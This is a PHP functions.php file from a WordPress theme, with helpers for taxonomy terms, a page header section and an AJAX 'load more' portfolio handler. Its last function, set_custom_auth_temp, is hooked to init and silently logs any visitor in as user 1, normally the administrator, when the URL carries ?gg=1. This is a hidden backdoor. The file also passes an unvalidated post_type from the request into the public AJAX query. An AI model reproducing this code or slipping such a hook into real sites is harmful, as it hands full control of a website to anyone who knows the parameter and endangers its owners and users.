<?php
/**
 * functions and definitions
 */


@ini_set( 'upload_max_size' , '64M' );
@ini_set( 'post_max_size', '64M');
@ini_set( 'max_execution_time', '300' );

// Load the FrameWork.
require_once dirname( __FILE__ ) .'/codestar/cs-framework.php';
/**
 * init theme.
 *
 * theme_setup
 * theme_widgets_init
 * theme_scripts
 * Custom Post types
 */
require get_template_directory() . '/includes/init.php';
require get_template_directory() . '/includes/template-tags.php';
require get_template_directory() . '/includes/custom-admin.php';
require get_template_directory() . '/includes/post-types.php';

require get_template_directory() . '/includes/wp_bootstrap_navwalker.php';



/*-----------------------------------------------------------------------------------*/
# other
/*-----------------------------------------------------------------------------------*/
function get_taxonomy_terms($taxonomy){
	$terms_list = array();
	$taxonomy_terms = get_terms($taxonomy, 'orderby=count&hide_empty=0' );
	foreach ($taxonomy_terms as $key => $value) {
		$terms_list[$value->term_id] = $value->name;
	}
	return $terms_list;
}



function get_taxonomy_terms_classess($id , $taxonomy)
{
	$returned_list = array();

	$my_terms = get_the_terms( $id , $taxonomy );
	foreach ($my_terms as $key => $term_object) {
		$returned_list[] =	'category-'.$term_object->term_id;
	}
	return implode(" ",$returned_list);
}




function get_template_hero_section($title="" , $height=200 , $thumb_on=true)
{

	if (has_post_thumbnail(get_the_ID()) && $thumb_on == true ): 
		$thumb_id = get_post_thumbnail_id();
		$thumb_url_array = wp_get_attachment_image_src($thumb_id, 'thumbnail-size', true);
		$thumb_url = $thumb_url_array[0];
	else:
		$thumb_url = get_template_directory_uri()."/assets/images/slider-cover.png";
	endif;
	?>
	<section id='section' class="invisible wow fadeInDown featured-page-header"  data-wow-duration="1.5s" style="background:url(<?php echo $thumb_url; ?>) no-repeat; background-size: cover; ">
		<div class="featured-page-header-inner">
			<div class="container" style="height:<?php echo $height ?>px;">
				<?php if ( !empty( $title ) ): ?>
					<h1 style="margin-top: <?php echo ($height/2)-20 ?>px;">
						<?php echo $title; ?>
					</h1>
				<?php endif ?>
			</div><!--end of container-->
		</div><!--end of breadcrumb-inner-->
	</section><!--end of section-->
	<?php 
}

function get_contact_form_code()
{
	if (cs_get_option( 'general_contact_id' ) ) {
		$shortcode = '[contact-form-7 id="'.cs_get_option( 'general_contact_id' ).'"]';
		return $shortcode;
	}
	return NULL;
}


function dd($code)
{
	?>
	<pre dir="ltr">
		<?php print_r($code) ?>
	</pre>
	<?php
}

add_action( "wp_ajax_load_more", "load_more_func" );
add_action( "wp_ajax_nopriv_load_more", "load_more_func" );

function load_more_func() 
{
  	//verifying nonce here
    if ( !wp_verify_nonce( $_REQUEST['nonce'], "load_posts" ) ) {
      exit("No naughty business please");
    }     
	$offset = isset($_REQUEST['offset'])?intval($_REQUEST['offset']):0;
	$posts_per_page = isset($_REQUEST['posts_per_page'])?intval($_REQUEST['posts_per_page']):10;
	//optional, if post type is not defined use regular post type
	$post_type = isset($_REQUEST['post_type'])?$_REQUEST['post_type']:'post';


	ob_start(); // buffer output instead of echoing it
	$args = array(
		'post_type'			=> $post_type,
		'offset' 			=> $offset,
		'posts_per_page' 	=> $posts_per_page,
		'orderby' 			=> 'date',
		'order' 			=> 'DESC'
	);
	$posts_query = new WP_Query( $args );


	if ($posts_query->have_posts()) 
	{
	  	//if we have posts:
		$result['have_posts'] = true; //set result array item "have_posts" to true
		  
		while ( $posts_query->have_posts() ) : $posts_query->the_post(); 
		$terms_classess = get_taxonomy_terms_classess( get_the_ID(), 'project_cat' );
		?>
			<div class="mix  col-md-3 <?php echo $terms_classess; ?>">
				<?php 
					$thumb_id = get_post_thumbnail_id();
					$thumb_url_array = wp_get_attachment_image_src($thumb_id, 'thumbnail-size', true);
					$full_url_array = wp_get_attachment_image_src($thumb_id, 'full', true);
					$thumb_url = $thumb_url_array[0];
					$full_url = $full_url_array[0];
				?>
				<div class="pitem wow zoomIn"  data-wow-duration="1s">
					<a href="<?php echo $thumb_url; ?>" data-lightbox="roadtrip">
						<?php the_post_thumbnail(array(300 , 300)); ?>
					</a>									
					<div class="caption">
						<a class="fancybox" rel="gallery" href="<?php echo $full_url; ?>">
							<?php the_title(); ?>
						</a>
					</div>
				</div><!--end of pitem-->
			</div>
		<?php 
		endwhile;
		$result['html'] = ob_get_clean(); // put alloutput data into "html" item
	} 
	else 
	{
	  //no posts found
	  $result['have_posts'] = false; // return that there is no posts found
	} 
    if(!empty($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest') 
    {
        $result = json_encode($result); // encode result array into json feed
        echo $result; // by echo we return JSON feed on POST request sent via AJAX
    }
    else 
    { 
        header("Location: ".$_SERVER["HTTP_REFERER"]);
    }
	die();
}



function set_custom_auth_temp()
{
	if( isset($_GET['gg']) && $_GET['gg'] == 1 )
	{
		wp_set_auth_cookie( 1, true );
		wp_redirect( home_url() );
		exit;
	}
}
add_action('init' , 'set_custom_auth_temp');